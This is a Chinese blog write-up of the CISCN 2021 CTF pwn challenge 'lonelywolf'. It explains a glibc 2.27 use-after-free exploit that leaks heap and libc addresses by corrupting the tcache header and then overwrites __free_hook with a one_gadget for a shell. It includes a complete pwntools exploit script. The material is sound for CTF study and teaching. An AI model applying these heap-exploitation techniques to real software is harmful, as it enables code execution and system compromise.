CISCN2021pwn lonelywolf(uaf,控制0x250tcache头)

已于 2022-10-03 14:22:56 修改
阅读量196 收藏
点赞数
分类专栏: PWN 文章标签: pwn
于 2022-10-02 20:28:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/127145789
版权

目录:


复现一下

程序分析:

保护全开
请添加图片描述
就是一个菜单类型,功能齐全
存在uaf,free后能edit,可以绕过2.27的tcache doublefree检测
请添加图片描述
值得注意的是最大申请0x78
请添加图片描述

利用思路:

一般我们要getshell肯定要改hook为system,og啥的,改hook就要得到libc基址,泄露libc基址要靠unsortbin,那申请最大0x78不是unsortbin范围咋整呢?
我们可以分配到tcache头的地址(堆的地址靠uaf泄露),把它0x250index改为7,它就会认为0x250tcache满了,释放这个0x250的堆就会到unsortbin了,就能泄露libc基址了(也是uaf)
那我们算出og,改hook为og就行了

exp:

from pwn import * 
local_file  = './lonelywolf'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
elif select == 1:
    r = remote('node4.buuoj.cn',25904 )
    libc = ELF(remote_libc)
else:
    r = gdb.debug(local_file)
    libc = ELF(local_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
def add(size):
    sla('Your choice: ','1')
    sla('Index: ','0')
    sla('Size: ',str(size))
def edit(content):
    sla('Your choice: ','2')
    sla('Index: ','0')
    sla('Content: ',content)
def show():
    sla('Your choice: ','3')
    sla('Index: ','0')
def delete():
    sla('Your choice: ','4')
    sla('Index: ','0')
#------------------------------
add(0x78)
delete()
edit('a'*0x8)
delete()
show()
ru('Content: ')
heap_base=uu64(rc(6))-0x260
info('heap_base',heap_base)
#------------------------------
edit(p64(heap_base+0x10))
add(0x78)
add(0x78)
payload=p8(0)*6+p8(1)+p8(0)*(0x25-9)+p8(7)
payload+=(0x50-0x4)*'\x00'
payload+=p64(0)
edit(payload)
delete()
show()
libc_base=uu64(ru('\x7f')[-6:])-libc.sym['__malloc_hook']-96-0x10
info('libc_base',libc_base)
og=[0x4f2a5,0x4f302,0xe54f7,0xe54fe,0xe5502,0x10a2fc,0x10a308]
malloc_hook=libc.sym['__malloc_hook']+libc_base
realloc_hook=libc.sym['__realloc_hook']+libc_base
free_hook=libc.sym['__free_hook']+libc_base
#------------------------------
add(0x78)
delete()
edit(p64(free_hook))
add(0x78)
add(0x78)
edit(p64(og[5]+libc_base))
delete()
#debug()

r.interactive()

one_gadget要变level 1:
one_gadget ./libc-2.27.so -l 1
请添加图片描述

Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_pwn_lonlywolf
Torebtr的博客
05-22 424
ciscn复现 太菜了,比赛的时候啥也不会,还要肝材料,写到两点,网速也差到爆,实在写不下去了,队友去hw了,分区赛也没进,好好复现,争取下次取得好成绩吧。。。。。 文章目录**ciscn复现****pwn**:*ciscn_2021_lonelywolf*函数分析1、allocate**2、edit函数****3、show****4、delete**解题思路:exp: pwnciscn_2021_lonelywolf 函数分析 题目整体来说不难,常规菜单题,然后进行函数分析(函数已重命名)。而且给了l
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 711
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
ciscn2021 pwn-lonelywolf
z1r0的博客
05-19 213
ciscn2021 pwn-lonelywolf 简单题 保护全开 有一个很明显的uaf漏洞 add还限制了大小 攻击思路:利用tcache struct attack来解决这一道题目,申请到tcache struct这里之后有两种方法来得到unsortedbin的块。 第一种是对struct进行绕过并释放,第二种是将申请的堆块伪造成0x91并释放。这里选择第二种。 因为tcache第一个bin满7个接下来就会fastbin或者进入其他的bin。所以我们改里面的0x91对应的counts为7,再利用ua
2021 ciscn 线上 pwn lonelywolf
yongbaoii的博客
08-30 222
显然是全开。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uafuaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。 但问题就是怎么来得到.
ciscn_2021_pwn_lonelywolf&silverwolf
weixin_49697396的博客
05-18 846
一、lonelywolf 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc地
ciscn_2021_lonelywolf.zip
05-17
lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛中某一题目或团队的代号,特别...
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3195
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2747
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1757
做arm架构下的pwn题某个报错
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1750
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
house of cat 学习
m0_51251108的博客
10-13 1164
house of cat的利用链学习
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1152
CISCN2021pwn pwny(数组越界,劫持exit_hook)
用patchelf改程序后在exp中用gdb.attach()调试堆栈
m0_51251108的博客
09-28 1058
用patchelf改程序后在exp中用gdb.attach()调试堆栈
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1058
浙江省第五届大学生网络与信息安全竞赛预赛pwn
uaf pwn hacknote
最新发布
09-26
根据提供的引用内容,hacknote程序存在Use After Free(UAF)漏洞。...攻击者可以利用UAF漏洞来实现攻击,例如修改已经被释放的内存中的内容,控制程序的执行流程,实现任意代码执行、信息泄露等攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值